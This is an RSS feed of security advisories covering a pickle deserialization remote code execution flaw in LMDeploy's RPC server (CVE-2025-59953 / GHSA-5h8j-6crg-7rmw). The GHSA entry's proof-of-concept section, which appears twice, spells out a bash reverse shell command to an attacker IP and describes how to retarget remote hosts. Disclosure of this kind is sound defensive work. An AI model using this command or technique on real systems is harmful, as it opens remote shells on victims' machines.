<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 23:22:30 +0000</lastBuildDate>
    <item>
      <title>CVE-2025-59953 — LMdeploy has Remote Code Execution by Pickle Deserialization via zmq_rpc.call_and_response() in InterLM/lmdeploy</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2025-59953</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; InternLM lmdeploy&lt;/p&gt;
&lt;p&gt;LMDeploy is a toolkit for compressing, deploying, and serving large language models. Starting in version 0.9.1 and prior to version 0.10.2, the LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server. Version 0.10.2 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; InternLM lmdeploy&lt;/p&gt;
&lt;p&gt;LMDeploy is a toolkit for compressing, deploying, and serving large language models. Starting in version 0.9.1 and prior to version 0.10.2, the LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server. Version 0.10.2 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2025-59953</guid>
    </item>
    <item>
      <title>GHSA-5h8j-6crg-7rmw — LMdeploy has Remote Code Execution by Pickle Deserialization via zmq_rpc.call_and_response() in InterLM/lmdeploy</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-5h8j-6crg-7rmw</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: lmdeploy&lt;/p&gt;
&lt;p&gt;### Description&lt;/p&gt;
&lt;p&gt;The LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server.&lt;/p&gt;
&lt;p&gt;### Proof of Concept&lt;/p&gt;
&lt;p&gt;* Step1:
The victim user starts a RPC server that connects to its network interface. We give our example code (server.py) in the attachment, you can reproduce directly with server.py.&lt;/p&gt;
&lt;p&gt;* Step2:
The attacker can then send malicious pickle dump data to the remote RPC address for the attack. We give a example to show how can an attacker acquire a command shell:
&amp;lt;img width=&amp;#34;832&amp;#34; height=&amp;#34;324&amp;#34; alt=&amp;#34;image&amp;#34; src=&amp;#34;https://github.com/user-attachments/assets/03b9654d-e25b-4e93-903a-2aae8b12e704&amp;#34; /&amp;gt;&lt;/p&gt;
&lt;p&gt;In this example, attacker modifies AsyncRPCClient and send a request containing malicious pickle dump data to let the victim execute command “bash -c ‘bash -i &amp;gt;&amp;amp; /dev/tcp/202.112.47.27/4444 0&amp;gt;&amp;amp;1’”, where 202.112.47.27 is an attacker’s server. 
Two points require special attention:
1.The client code originally only connects to localhost over a socket, but an attacker can easily change localhost to another IP to perform remote exploitation, because the RPC server does not validate the connecting IP.
2.The RPC server’s port is randomized, but an attacker can still scan ports to find and exploit it; in our demo we expl…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: lmdeploy&lt;/p&gt;
&lt;p&gt;### Description&lt;/p&gt;
&lt;p&gt;The LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server.&lt;/p&gt;
&lt;p&gt;### Proof of Concept&lt;/p&gt;
&lt;p&gt;* Step1:
The victim user starts a RPC server that connects to its network interface. We give our example code (server.py) in the attachment, you can reproduce directly with server.py.&lt;/p&gt;
&lt;p&gt;* Step2:
The attacker can then send malicious pickle dump data to the remote RPC address for the attack. We give a example to show how can an attacker acquire a command shell:
&amp;lt;img width=&amp;#34;832&amp;#34; height=&amp;#34;324&amp;#34; alt=&amp;#34;image&amp;#34; src=&amp;#34;https://github.com/user-attachments/assets/03b9654d-e25b-4e93-903a-2aae8b12e704&amp;#34; /&amp;gt;&lt;/p&gt;
&lt;p&gt;In this example, attacker modifies AsyncRPCClient and send a request containing malicious pickle dump data to let the victim execute command “bash -c ‘bash -i &amp;gt;&amp;amp; /dev/tcp/202.112.47.27/4444 0&amp;gt;&amp;amp;1’”, where 202.112.47.27 is an attacker’s server. 
Two points require special attention:
1.The client code originally only connects to localhost over a socket, but an attacker can easily change localhost to another IP to perform remote exploitation, because the RPC server does not validate the connecting IP.
2.The RPC server’s port is randomized, but an attacker can still scan ports to find and exploit it; in our demo we expl…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-5h8j-6crg-7rmw</guid>
    </item>
  </channel>
</rss>
